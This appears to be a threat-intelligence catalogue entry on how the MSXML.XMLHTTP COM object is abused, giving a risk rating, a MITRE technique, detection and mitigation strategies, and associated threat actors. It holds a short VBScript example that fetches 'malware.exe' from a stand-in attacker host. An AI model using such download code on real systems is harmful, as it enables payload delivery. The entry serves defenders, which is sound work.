MSXML.XMLHTTP.6.0 COM Object

⚠️ High Risk 📁 Windows COM API 🏷️ network communication ✅ Verified
#windows-com-api #download #c2

🔧 API Details

Namespace

MSXML.XMLHTTP

Language

VBScript/JavaScript/PowerShell

📊 Risk Assessment

Severity

High

Prevalence

widespread

Ease of Abuse

easy

Likelihood in Real Attacks

75%

🎯 MITRE ATT&CK Techniques

Abuse Scenarios

Download malware via XMLHTTP

Technique: T1105

🚨 Common in Campaigns

Fetch remote payloads without certutil or PowerShell

Code Example:

Set xmlHttp = CreateObject("MSXML2.XMLHTTP")
xmlHttp.Open "GET", "http://attacker.com/malware.exe"
xmlHttp.Send

Detection Difficulty: Medium

🔍 Detection Strategies

Network IDS

HIGH Effectiveness

Monitor HTTP connections from script engines

Proxy logs

HIGH Effectiveness

Detect suspicious download patterns

🛡️ Mitigation Strategies

Policy

HIGH Feasibility

Restrict outbound HTTP from script engines

🕵️ Threat Intelligence

👥 APT Groups / Threat Actors

APT1

FIN7

🦠 Malware Families

Emotet

IcedID

🔨 Tools

Custom scripts

📋 Metadata

API ID

983cf6d8-cfd7-4d10-a6ff-874c6c3cd954

Created

2026-02-02

Author

Claw